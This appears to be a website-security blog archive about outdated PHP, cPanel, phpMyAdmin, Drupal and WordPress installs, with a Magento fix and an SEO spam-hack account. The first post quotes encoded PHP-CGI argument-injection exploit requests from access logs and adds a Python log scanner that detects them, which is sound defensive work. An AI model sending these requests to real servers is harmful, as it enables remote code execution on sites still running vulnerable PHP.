Hackers Still Targeting Outdated PHP Versions

Back in May we discussed a website we cleaned up that had been hacked due to the exploitation of a vulnerability in the outdated version of PHP being used on the server. The hack would have been prevented if PHP had been kept up to date, but based on the fact that we have recently seen numerous attempts to exploit the vulnerability there must be a fair number of websites still being run on vulnerable versions.

The vulnerability in question was fixed in versions 5.3.13 and 5.4.3 and only impacts CGI-based setups. The most recent releases of PHP – 5.3.28, 5.4.23, and 5.5.7 – all include security updates, so PHP should be upgraded to those versions as soon as possible.

If you are wondering what version of PHP your web host is using for your website, there are a number of ways to find out. The least technical way is to contact their customer support and ask them what version of PHP is in use. It would also be good to ask them what their upgrade policy is for PHP and the other software powering the web server, to make sure that they are handling that properly. You can sometimes find the PHP version in use in the control panel for your website or in the administrative area of the website. You can also use a tool we have created that allows you to check the version of various software running on the server your website is on.

An example of the requests we have been seeing recently is included below. One change from the successful hack we mentioned in the previous post is that the requests are encoded in this instance. That could be to make it harder for software attempting to filter malicious requests to detect that the requests are malicious.

209.139.209.78 - - [31/Dec/2013:23:38:21 -0500] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 2347 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

209.139.209.78 - - [31/Dec/2013:23:38:22 -0500] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 2347 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

209.139.209.78 - - [31/Dec/2013:23:38:23 -0500] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 2347 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"

209.139.209.78 - - [31/Dec/2013:23:38:24 -0500] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 2347 "-" "Googlebot/2.1(+http://www.googlebot.com/bot.html)"

209.139.209.78 - - [31/Dec/2013:23:38:24 -0500] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 2347 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
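As an added example (not part of the original post), the following Python scans Apache access log lines for the request shape shown above and reports which php.ini directives each one tries to force on the CGI binary, so you can tell from your own logs whether you are being probed and whether the server actually handed the request to PHP. It embeds the first log line from the post (quotes straightened) plus two constructed benign lines; the directive list and regular expressions are my own.

```python
import re
from urllib.parse import unquote

# Apache "combined" log line (the post's copy has curly quotes; logs use ASCII ").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# CGI binaries the requests in the post probed for (php, php5, php-cgi, ...).
CGI_PHP_RE = re.compile(r'^/cgi-bin/php[^/]*$')

# php.ini directives the post's requests force with -d; any of them arriving
# in a query string is a red flag whatever PHP version the server runs.
WATCHED_DIRECTIVES = ('allow_url_include', 'auto_prepend_file', 'disable_functions',
                      'open_basedir', 'safe_mode', 'suhosin.simulation')


def cgi_argv_injection(target):
    """Return the watched directives an argv-style query sets, or None.

    RFC 3875 (CGI 1.1) passes a query string with no literal '=' to the script
    as command-line arguments split on '+'. Encoding '=' as %3D, as the post's
    requests do, keeps the query on that path while smuggling name=value pairs
    to PHP's -d option; PHP 5.3.13 / 5.4.3 stopped accepting such arguments.
    """
    path, _, query = target.partition('?')
    if not CGI_PHP_RE.match(path) or not query or '=' in query:
        return None
    args = [unquote(a) for a in query.split('+')]
    if not args[0].startswith('-'):
        return None  # plain argv-style query, not an interpreter option
    return [d for d in WATCHED_DIRECTIVES if any(a.startswith(d + '=') for a in args)]


def scan_log(lines):
    """One finding per matching request. Status 301 (as in the post) means the
    server redirected rather than executed it; a 200 would warrant a closer look."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = cgi_argv_injection(m['target'])
        if hits is not None:
            findings.append({'ip': m['ip'], 'time': m['ts'], 'status': int(m['status']),
                             'binary': m['target'].partition('?')[0], 'directives': hits})
    return findings


# First request from the post's log (quotes straightened) plus two constructed
# benign lines for contrast.
SAMPLE_LOG = [
    '209.139.209.78 - - [31/Dec/2013:23:38:21 -0500] "POST /cgi-bin/php?'
    '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+'
    '%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+'
    '%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+'
    '%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+'
    '%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+'
    '%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+'
    '%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+'
    '%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E'
    ' HTTP/1.1" 301 2347 "-" "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"',
    '198.51.100.7 - - [31/Dec/2013:23:40:00 -0500] "GET /index.php?page=home'
    ' HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Dec/2013:23:41:00 -0500] "GET /cgi-bin/php?foo+bar'
    ' HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
]
```

Run `scan_log` over a real access log (one line per list element) to get the probing source, the binary name tried, the directives requested and the response status per request.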

HostMonster Doesn’t Do Basic Site Security

When it comes to the security of your website, your web host plays an important part, but too often they are failing to do what they need to do to keep your website secure. One of the areas we have seen web hosts fail at is keeping the control panel software running underneath websites up to date. With the Plesk control panel that has led to large numbers of websites being hacked due to vulnerabilities that existed in older versions of the software. In an attempt to make it easier to spot when web hosts are failing to keep control panel software up to date we have just released a web browser extension, Control Panel Version Check, available for Firefox and Chrome, that provides version information for cPanel and Plesk based control panels and warns when an outdated version is in use.

To show how the extension can highlight unsafe hosting let’s take a look at one host. HostMonster claims that “By design our servers are secure.” and that “The security level of your site depends on the code that is uploaded to HostMonster’s Servers.”. You would think that when they make such a definite statement about their security and fault customers for any security breach they would at least be doing basic security, but that isn’t the case. The second item on their basic security checklist is to “Update all scripts/applications to the newest versions available.” and their reason for this is that “Old security holes are updated and remedied in new versions of software, so updating to the newest versions available ensures that you are running the most secure option available.”. That sounds like reasonable advice; unfortunately they don’t follow it, despite claiming they are secure by design:

HostMonster is running cPanel 11.32

Support for version 11.32 of cPanel ended in August. Since then cPanel has put out several security announcements for vulnerabilities in cPanel. With support ended for cPanel 11.32, none of those vulnerabilities would be fixed in that version.

It doesn’t end there, with our phpMyAdmin Version Check extension you can see that they are also running an outdated version of phpMyAdmin:

HostMonster is running phpMyAdmin 3.4.11.1

That version is over a year out of date and there have been numerous security fixes released in subsequent versions.

Using Magento with PHP 5.4 and 5.5

Update (November 24, 2014): Magento has now released Magento 1.9.1.0, which adds support for PHP 5.5.

Update (January 21, 2014): Magento has now released patches to make Magento 1.6.0.0-1.8.1.0 compatible with PHP 5.4.

Back in July the developers of PHP started encouraging moving from PHP 5.3 to either PHP 5.4 or 5.5 due to the fact that for the next year the only support for PHP 5.3 would be security updates and thereafter support will end entirely. We have now started to see that shift happening and along with it we are seeing an increase in questions and issues related to Magento’s support for PHP 5.4 and 5.5.

As with previous moves from one PHP version to another, PHP 5.4 and 5.5 have made breaking changes from earlier versions of PHP. That means that software can stop working on a new version of PHP, so you should make sure that the software you are using is compatible with the new version ahead of the upgrade. Currently Magento does not officially support PHP 5.4 or 5.5. Magento’s System Requirements page currently lists the supported versions of PHP as 5.2.13 – 5.3.24. While PHP 5.4 and 5.5 are not officially supported we have found Magento will run on them, but there are a couple of important issues that can cause problems, which we will get to in a moment.

While we recommend upgrading to Magento 1.8.0.0, as it includes a number of security enhancements and other improvements, upgrading to that version will not provide improved compatibility with the newer versions of PHP, even if you are currently using a fairly old version of Magento. We recently did an upgrade of a website that was still running Magento 1.3, and that website was running without issue on PHP 5.4.

There are two areas where you can run into problems when using PHP 5.4 or 5.5:

Order Invoice Printing Error

The one issue that we have found does occur in Magento when using PHP 5.4 or 5.5 is that when you try to print an order’s invoice you will get an error: “Fatal error: Declaration of Zend_Pdf_FileParserDataSource_File::__construct() must be compatible with Zend_Pdf_FileParserDataSource::__construct()”. There is an easy fix for this. In the file /lib/Zend/Pdf/FileParserDataSource.php change the line:

abstract public function __construct();

to:

abstract public function __construct($filePath);

Extension Incompatibilities

While Magento will work with the newer versions of PHP, extensions may not be compatible with them. PHP 5.4 was released in March of 2012 and 5.5 was released in June of this year, so the latest releases of extensions should be compatible with the newer versions of PHP by now. The developer of the extension should also be able to tell you if it is compatible with the newer version of PHP. If you want to ensure everything will run smoothly, test a copy of the website on a server running the newer version of PHP before the server with the live website has its PHP version updated. If an extension is not working with the new version of PHP and you don’t want to replace the extension, you can use the details of the breaking changes in PHP 5.4 and 5.5 as a starting place to determine what changes need to be made to the extension.

Hacked Websites Used To Get Top 10 Search Result For UGG Boots

When hacked websites are covered in the news it is usually due to information stored on the websites being compromised or malware being added to the website, but many websites are hacked for the less newsworthy goal of getting a top search result. We most often see this type of hack used to try to get top search results for pharmaceutical related terms, hence this type of hack is often incorrectly labeled as being a pharma hack. We just ran into a set of websites hacked to reach the top search results for a very different item, UGG boots. The Huffington Post reported earlier this week that UGG boots are the fourth most popular searched gift on Google Shopping, so it is easy to understand why this term would be targeted. In this case the hackers have been fairly successful in making it to the top of the results. Currently the eighth result for the search term “UGG boots” in Google is one of the websites they have hacked:

UGG Boots Search Result Page 1

At this point Google has detected that the website in question has been hacked, but they haven’t removed it from the search results. To put that place in the results in perspective, the major chains DICK’S Sporting Goods, Victoria’s Secret, and Bloomingdale’s all have their UGG Boot pages showing up on the second page of search results for the term.

Hackers also made it to the eighth spot for the term “uggs” using another hacked website:

Uggs Search Result Page 1

So how do the hackers gain top spots in the search results? The hackers use two sets of websites that they have hacked. The first set are hacked to add links to pages on the second set of websites. In the first set of websites HTML code full of links like this is added to the website:

Spam Link Source Code

Links are an important factor in how Google decides what pages to show in its search results, so if you can hack a lot of websites and insert links to a web page you want to get into the top search results, you can make it happen.

The second set of websites are hacked to show Google content related to the search term instead of their usual content, which is referred to as cloaking. One of the websites in the links above is the website for the Virginia Department of Rail and Public Transportation, and you can see the cloaking in action with it. If you do a search for their website right now on Google you will get this listing:

VA DRPT Google Search Result

Tech News Websites Not Taking Basic Security Measures With Their Websites

When it comes to improving the security of websites one of the biggest problems we see is that there is so much bad information available on the Internet, especially the information coming from companies trying to sell security products and services. We would hope that news organizations would provide the public with a source of better information, but most of the security reporting we see on technology news websites is just as bad as anywhere else. Their lack of security knowledge also impacts their own websites, as we see that they are not taking basic security measures with their websites and are therefore leaving them vulnerable.

We found three prominent technology news websites that are running very out of date versions of the Drupal software. Keeping the software on a website up to date prevents known vulnerabilities from being exploited, and we have found that when vulnerabilities in website software are exploited it is almost always due to a vulnerability that has already been patched in a newer release of the software.

ITworld

ITworld is Running Drupal 6.19

ITworld is running a version of Drupal that is nearly three years out of date – the next version was released in December of 2010 – and they have missed three security releases.

InfoWorld

InfoWorld is Running Drupal 6.16

InfoWorld is running a version of Drupal that is nearly three and a half years out of date – the next version was released in June of 2010 – and they have missed four security releases.

Network World

Network World is Running Drupal 5.14

Network World is in much worse shape than the other two organizations, as they are using Drupal 5, for which support ended back at the beginning of 2011. They haven’t even bothered to at least make sure they are running the most recent version of Drupal 5. In fact they haven’t updated it in over four and a half years – the next version was released in January of 2009 – and they missed the last nine security releases for Drupal 5.

Rackspace’s Bad Security

We have found that web hosts often prominently advertise their focus on security while not actually caring about security enough to even take basic security measures. Let’s take a quick look at Rackspace to see that in action. Rackspace has a whole section of their website dedicated to security. If you look over that you would probably be impressed. Though if you look closely you might see warning signs. For example, they have a PDF about their “holistic approach to security” that was written by their Director of Product Marketing. Why is a product marketing person writing a security guide?

You don’t have to look hard to see that Rackspace doesn’t actually have much concern for security. A really basic security measure is keeping the software you run up to date. That way the software isn’t vulnerable to known security vulnerabilities that have already been fixed. An important component of many hosting services is phpMyAdmin, which allows administration of MySQL databases. If someone can exploit phpMyAdmin they can gain access to the database underlying a website. With that they could collect customer information stored in the database, create a new administrator account for a website to gain further access, or do other harmful things. If you believed Rackspace’s claims about their focus on security you would certainly expect them to be keeping their installation of phpMyAdmin up to date. Unfortunately for their customers, they don’t:

Rackspace Cloud is using phpMyAdmin 3.4.9.0

The version they are running is over a year and a half out of date (the next version of phpMyAdmin was released in February of 2012). It gets even worse: Rackspace only upgraded to that version after a customer alerted them that they were running an outdated and insecure version of phpMyAdmin, and it took them six months after being alerted to do that upgrade.

According to the information on phpMyAdmin’s security page the version Rackspace is running contains a number of security vulnerabilities. The version they are using is so out of date that phpMyAdmin no longer lists if vulnerabilities impact that version, so it isn’t clear exactly how many there are.

Netfirms Running Over Seven Years Out of Date Version of phpMyAdmin

One of the most basic measures for keeping websites secure is to keep the software running the website up to date; this is something that web hosts know and tell their customers. Unfortunately, many web hosts don’t seem to feel that they need to heed their own advice and run out of date software on their servers. This puts their clients at risk of being hacked through exploitation of a known vulnerability in that software. Web hosts’ use of outdated software is also a warning sign that they may not be handling the rest of their security properly either.

When we do work on a client’s website we check what version of some common software (PHP, MySQL, phpMyAdmin, etc.) is running on the server. This is partly so that we can see how well web hosts are doing at keeping that software up to date and also so that we can alert the clients when severely out of date software is in use. We were recently doing work on a website hosted with Netfirms and we found that the server was using a version of phpMyAdmin, 2.8.0.1, that is over seven years out of date:

Netfirms is Running phpMyAdmin 2.8.0.1

That version was released on March 8 of 2006 and the next version, 2.8.0.2, was released eight days later. phpMyAdmin provides a page listing all security announcements for the software (something that other software developers should also be providing). Based on just the announcements for 2006 and 2007, the version of phpMyAdmin Netfirms is using probably contains 16 serious severity security issues and 1 considered “quite dangerous”.

If you want to check if web hosts you or your clients use are running an outdated version of phpMyAdmin you can check with our phpMyAdmin Version Check extension, which is available for Firefox and Chrome.

It is not just phpMyAdmin that Netfirms doesn’t keep up to date. They are using PHP 5.3.13, which is over a year out of date and also has known security vulnerabilities (including ones that were fixed in the very next release).

Amazingly, the fact that they have some pretty obvious security problems hasn’t stopped the security company SiteLock from declaring that Netfirms is secure, as can be seen in the footer of Netfirms’ website:

SiteLock SECURE Badge Shown on Netfirms Website

Secure This: A Website Security Company That Doesn’t Care About Security

One of the biggest problems we see with improving the security of websites is that while basic security measures are often not being taken, security companies are trying to sell security services that are not actually needed for most websites. We often see the negative impact of this as people contact us about cleaning up websites: they think they need those types of services because those other companies are pushing them, while they don’t want to make sure that the basic security measures that will actually protect their website are done. A possible explanation of why the companies push those services is that many security companies don’t understand or don’t actually care about security.

Yet another example of this that we came across is Secure This, which is a company that wants to sell you automated vulnerability scanning for various software, including Joomla. Your average Joomla based website doesn’t need this, because the software in use would have already been tested against these automated scanners and any security vulnerabilities still to be found would not be spotted by them. What you instead want to do is make sure that you keep the software up to date, so that when security vulnerabilities are found you are protected with the latest version of the software. The importance of keeping Joomla and extensions up to date isn’t just our advice; Joomla says that keeping them updated is one of the “most important guidelines” for keeping your website secure. Secure This doesn’t feel they need to do that with their website though:

Secure This is Running Joomla 3.1.1

The latest version of Joomla 3.x, 3.1.5, included a fix for a Critical Priority security vulnerability, so if Secure This cared about the security of their own website they would have made sure to upgrade promptly in August, when 3.1.5 was released.

If you don’t want to handle keeping Joomla updated you can hire us to do it for you.

MIT Website Running on Very Outdated Version of Apache HTTP Server

When it comes to website security, even institutions that you would think would be among the best able to protect themselves get hacked. In January the Massachusetts Institute of Technology’s (MIT) website was hacked on multiple occasions. While that seems surprising in itself, what is more surprising is that more than six months after that happened MIT is still not taking care of the security of their website.

With our Server Details web browser extension you can see that MIT is using an outdated version of the Apache HTTP Server to run their website:
MIT's Website is Running on Apache 1.3.41

The version they are using is not just a little out of date. Support for Apache HTTP Server 1.3 ended back in February of 2010, so MIT should have upgraded to a newer version three and a half years ago.

What does it say that even after getting hacked multiple times a major institution is not taking the security of their website seriously?

Outbrain Website Running Outdated and Insecure Version of WordPress

Yesterday a number of major news websites were attacked due to a breach at Outbrain, a provider of widgets that display content recommendations. While the breach of Outbrain utilized social engineering, it is clear that Outbrain isn’t properly handling the security of their systems, as they don’t even take basic security measures with their own website. One of the basic security measures is keeping the software running a website up to date, which Outbrain hasn’t been doing:

Outbrain is Running WordPress 3.3.2

Not only is that version over a year out of date, but they have failed to apply four updates that included security fixes (3.4.1, 3.4.2, 3.5.1, and 3.5.2). The release announcement for 3.5.2 included the warning:

This is a security release for all previous versions and we strongly encourage you to update your sites immediately.

Considering how easy it is to update WordPress, their customers should be worrying about what other things they are also failing to do.